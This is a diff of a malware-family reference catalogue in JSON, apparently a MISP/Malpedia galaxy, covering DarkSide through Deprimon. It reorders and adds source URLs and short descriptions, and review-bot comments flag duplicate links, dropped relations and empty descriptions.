+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
+ "https://twitter.com/GelosSnake/status/1451465959894667275",
"https://blog.group-ib.com/blackmatter#",
"https://us-cert.cisa.gov/ncas/alerts/aa21-131a",
- "https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted",
+ "https://www.glimps.fr/lockbit3-0/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.mandiant.com/resources/burrowing-your-way-into-vpns",
"https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
"https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
- "https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/",
- "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
- "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
- "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://github.com/sisoma2/malware_analysis/tree/master/blackmatter",
- "https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/",
+ "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
+ "https://threatpost.com/guess-fashion-data-loss-ransomware/167754/",
"https://www.databreaches.net/a-chat-with-darkside/",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://www.youtube.com/watch?v=qxPXxWMI2i4"
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://github.com/sisoma2/malware_analysis/tree/master/blackmatter",
+ "https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/",
+ "http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware",
+ "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
+ "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted",
+ "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/",
+ "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a",
+ "https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/",
+ "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/",
+ "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
+ "https://blog.group-ib.com/blackmatter2",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/",
+ "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps",
+ "https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf"
],
"synonyms": [
"BlackMatter"
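Review bot: the rewritten DarkSide refs list carries the same resource twice in two forms: the CrowdStrike Carbon Spider/Sprite Spider ESXi post with and without `?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout`, and the chuongdong DarkSide analysis under both `http://` and `https://`. Strip query-string tracking parameters and normalize scheme before deduplicating, otherwise the list grows by one line each time the upstream source records another variant of a URL it already has. The genuine additions here (for example the Symantec Noberus/BlackCat TTPs post and the Elliptic "bitcoins on the move" post) are buried in roughly 230 lines of reordering for the same reason noted on the DarkComet hunk; a stable sort of refs would make them reviewable.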
@@ -19800,16 +21051,16 @@
"value": "DarkTortilla"
},
{
- "description": "DtBackdoor",
+ "description": "According to PCrisk, DarkTrack is a malicious program classified as a Remote Access Trojan (RAT). This type of malware enables remote access and control over an infected device. The level of control these programs have varies, however, some can allow user-level manipulation of the affected machine.\r\n\r\nThe functionalities of RATs likewise varies and so does the scope of potential misuse. DarkTrack has a broad range of functions/capabilities, which make this Trojan a highly-dangerous piece of software.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat",
- "https://www.facebook.com/darktrackrat/",
+ "https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
"https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html",
"https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf",
- "https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1",
- "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml",
- "https://www.tgsoft.it/files/report/download.asp?id=7481257469"
+ "https://www.facebook.com/darktrackrat/",
+ "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml"
],
"synonyms": [],
"type": []
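Review bot: the old `description` value `DtBackdoor` for DarkTrack reads as an alias that had been put in the wrong field, and this hunk replaces it with the PCrisk text while `synonyms` stays `[]`; if DtBackdoor is an alias of DarkTrack it should move into `synonyms` rather than disappear from the cluster. The new description also embeds a literal `\r\n\r\n` inside the JSON string; normalize line endings in the generator (LF, or a single space for a one-paragraph summary) so the text renders consistently. The refs in this hunk are unchanged apart from ordering.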
@@ -19822,9 +21073,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc",
+ "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884",
"https://reaqta.com/2017/11/short-journey-darkvnc/",
- "https://isc.sans.edu/diary/rss/28934",
- "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884"
+ "https://isc.sans.edu/diary/rss/28934"
],
"synonyms": [],
"type": []
@@ -19837,10 +21088,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf",
- "https://www.secureworks.com/research/threat-profiles/bronze-butler",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
+ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/",
- "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+ "https://www.secureworks.com/research/threat-profiles/bronze-butler",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/"
],
"synonyms": [
"Muirim",
@@ -19871,15 +21122,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.datper",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
- "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
- "https://www.macnica.net/mpressioncss/feature_05.html/",
- "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://www.macnica.net/mpressioncss/feature_05.html/",
+ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
+ "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html",
"https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/"
],
"synonyms": [],
"type": []
@@ -19892,14 +21143,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.daxin",
- "https://www.reuters.com/technology/new-chinese-hacking-tool-found-spurring-us-warning-allies-2022-02-28/",
- "https://www.nzz.ch/technologie/china-soll-mit-praezedenzloser-malware-regierungen-ausspioniert-haben-ld.1672292",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-malware-espionage-analysis",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage",
- "https://twitter.com/M_haggis/status/1498399791276912640",
- "https://gist.github.com/usualsuspect/839fbc54e0d76bb2626329cd94274cd6",
"https://www.bleepingcomputer.com/news/security/chinese-cyberspies-target-govts-with-their-most-advanced-backdoor/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage-analysis"
+ "https://www.nzz.ch/technologie/china-soll-mit-praezedenzloser-malware-regierungen-ausspioniert-haben-ld.1672292",
+ "https://twitter.com/M_haggis/status/1498399791276912640",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage-analysis",
+ "https://www.reuters.com/technology/new-chinese-hacking-tool-found-spurring-us-warning-allies-2022-02-28/",
+ "https://teamt5.org/tw/posts/backdoor-of-driver-analysis-Daxin/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-malware-espionage-analysis",
+ "https://gist.github.com/usualsuspect/839fbc54e0d76bb2626329cd94274cd6"
],
"synonyms": [],
"type": []
@@ -19912,11 +21164,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader",
- "https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/",
"https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html",
- "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/",
+ "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses",
+ "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat",
"https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands",
- "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat"
+ "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/",
+ "https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/"
],
"synonyms": [
"ModiLoader",
@@ -19927,29 +21180,61 @@
"uuid": "17e0756b-6cc6-4c25-825c-5fd85c236218",
"value": "DBatLoader"
},
+ {
+ "description": "This malware uses DropBox as C&C channel.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dboxagent",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "407002c1-1781-4d1c-90bb-3d859f5c2943",
+ "value": "DBoxAgent"
+ },
+ {
+ "description": "Ransomware written in .NET.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dcdcrypt",
+ "https://labs.k7computing.com/index.php/dcdcrypt-ransomware-decryptor/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6192f006-e1ba-47cb-b388-af82e4435a51",
+ "value": "DcDcrypt"
+ },
{
"description": "DCRat is a typical RAT that has been around since at least June 2019.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://community.riskiq.com/article/50c77491",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
- "https://www.youtube.com/watch?v=ElqmQDySy48",
- "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
- "https://blogs.infoblox.com/cyber-threat-intelligence/cyber-campaign-briefs/malspam-campaign-delivers-dark-crystal-rat-dcrat/",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://cert.gov.ua/article/160530",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
- "https://cert.gov.ua/article/405538",
- "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html",
- "https://www.zscaler.com/blogs/security-research/freecryptoscam-new-cryptocurrency-scam-leads-installation-backdoors-and",
+ "https://embee-research.ghost.io/dcrat-manual-de-obfuscation/",
"https://forensicitguy.github.io/snip3-crypter-dcrat-vbs/",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://cert.gov.ua/article/160530",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://community.riskiq.com/article/50c77491",
+ "https://www.youtube.com/watch?v=ElqmQDySy48",
+ "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
+ "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time",
+ "https://www.zscaler.com/blogs/security-research/freecryptoscam-new-cryptocurrency-scam-leads-installation-backdoors-and",
+ "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
"https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html",
- "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html"
+ "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://blogs.infoblox.com/cyber-threat-intelligence/cyber-campaign-briefs/malspam-campaign-delivers-dark-crystal-rat-dcrat/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html",
+ "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://cert.gov.ua/article/405538",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"DarkCrystal RAT"
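Review bot: the regenerated DCRat refs still carry the Trustwave URL twice, once without and once with a trailing slash (`.../overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war` and `.../overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/`); normalise trailing slashes before de-duplicating so the list does not keep both. Otherwise the hunk adds six new references (embee-research, two Spamhaus botnet updates, the Zscaler Snip3 post, kienmanowar, Recorded Future) and two new clusters; in the DBoxAgent description the product name is spelled "Dropbox", not "DropBox".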
@@ -19992,24 +21277,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong",
- "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
- "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
"https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
+ "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
"https://unit42.paloaltonetworks.com/atoms/rancortaurus/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "57dd0828-79d7-11e8-a7d8-57db14e1ef24",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2",
"value": "DDKONG"
},
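Review bot: besides reordering refs, this hunk drops the whole `related` array, i.e. the "similar" link to cluster 57dd0828-79d7-11e8-a7d8-57db14e1ef24 tagged almost-certain. That is a semantic change to the galaxy, not a reference refresh, and nothing in the hunk replaces the relation. If the generator no longer emits `related` entries, say so explicitly in the change description (the same drop happens for Deprimon and Dimnie further down); if it was accidental, restore the block.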
@@ -20018,7 +21294,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.deadwood",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/"
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/",
+ "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/"
],
"synonyms": [
"Agrius",
@@ -20036,6 +21315,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dealply",
"https://securelist.com/threat-in-your-browser-extensions/107181",
+ "https://www.catonetworks.com/blog/the-dga-algorithm-used-by-dealply-and-bujo/",
"https://kienmanowar.wordpress.com/2021/05/11/quick-analysis-note-about-dealply-adware/"
],
"synonyms": [],
@@ -20050,14 +21330,14 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dearcry",
"https://www.youtube.com/watch?v=Hhx9Q2i7zGo",
- "https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s",
- "https://www.youtube.com/watch?v=qmCjtigVVR0",
- "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://www.youtube.com/watch?v=MRTdGUy1lfw",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b",
- "https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s",
"https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://www.youtube.com/watch?v=qmCjtigVVR0",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.youtube.com/watch?v=MRTdGUy1lfw",
+ "https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf"
],
"synonyms": [
"DoejoCrypt"
@@ -20072,13 +21352,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom",
- "https://asec.ahnlab.com/1269",
- "https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md",
- "https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html",
- "https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html",
"https://twitter.com/Amigo_A_/status/1196898012645220354",
"https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html",
- "https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html"
+ "https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html",
+ "https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md",
+ "https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html",
+ "https://asec.ahnlab.com/1269"
],
"synonyms": [
"deathransom",
@@ -20107,8 +21387,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal",
- "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf",
- "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html"
+ "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html",
+ "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf"
],
"synonyms": [],
"type": []
@@ -20116,6 +21396,20 @@
"uuid": "fba088fb-2659-48c3-921b-12c6791e6d58",
"value": "Decebal"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deepcreep",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/",
+ "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a29e21f9-b193-4369-8351-95860d56de03",
+ "value": "DeepCreep"
+ },
{
"description": "",
"meta": {
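Review bot: the new DeepCreep cluster ships with `"description": ""` while its two references (BleepingComputer, WeLiveSecurity) exist precisely to describe the family, and the neighbouring new entries in this patch (DBoxAgent, DcDcrypt, DeimosC2) do carry a description. A one-line summary taken from the Malpedia page or the ESET write-up would make the entry searchable; an empty string is also exactly what downstream tools will display to analysts.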
@@ -20134,19 +21428,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.defray",
- "https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html",
- "https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals",
- "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
- "https://www.secureworks.com/research/threat-profiles/gold-dupont",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
- "https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
"https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
"https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/"
+ "https://www.secureworks.com/research/threat-profiles/gold-dupont",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html",
+ "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
+ "https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf"
],
"synonyms": [
"Glushkov"
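Review bot: the list keeps two Proofpoint URLs that look like the same post under old and new paths (`/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals` and `/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals`); verify and keep one. The Unit 42 vatet-pyxie-defray777 pages are also listed with inconsistent trailing slashes (/2/ and /5/ versus /3 and /4), harmless for readers but enough to defeat any naive de-duplication in the generator.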
@@ -20161,6 +21455,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.deimos",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
"https://www.elastic.co/blog/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant"
],
"synonyms": [],
@@ -20169,6 +21464,19 @@
"uuid": "e369e45e-0e92-4811-822e-5e598285465e",
"value": "Deimos"
},
+ {
+ "description": "Trend Micro describes DeimosC2 as an open-source C&C framework that was released in June 2020. It is a fully-functional framework that allows for multiple attackers to access, create payloads for, and interact with victim computers. As a post-exploitation C&C framework, DeimosC2 will generate the payloads that need to be manually executed on computer servers that have been compromised through other means such as social engineering, exploitation, or brute-force attacks. Once it is deployed, the threat actors will gain the same access to the systems as the user account that the payload was executed as, either as an administrator or a regular user. Note that DeimosC2 does not perform active or privilege escalation of any kind.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deimos_c2",
+ "https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1f1a894f-7a1b-4b98-9280-d33cf884a539",
+ "value": "DeimosC2"
+ },
{
"description": "",
"meta": {
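Review bot: the last sentence of the new DeimosC2 description, "does not perform active or privilege escalation of any kind", is missing a word after "active"; if it is a verbatim quotation of the Trend Micro post it should be kept but marked as a quote, otherwise fix the phrase. Note also that "Deimos" (win.deimos, the Elastic write-up) and "DeimosC2" (win.deimos_c2) are now adjacent entries with near-identical names, so the Malpedia IDs in the refs and this description are the only things telling them apart; keep the description precise.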
@@ -20203,15 +21511,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c76874cd-0d73-4cbf-8d39-a066900dd4ce",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "17429ed4-6106-4a28-9a76-f19cd476d94b",
"value": "Deprimon"
},
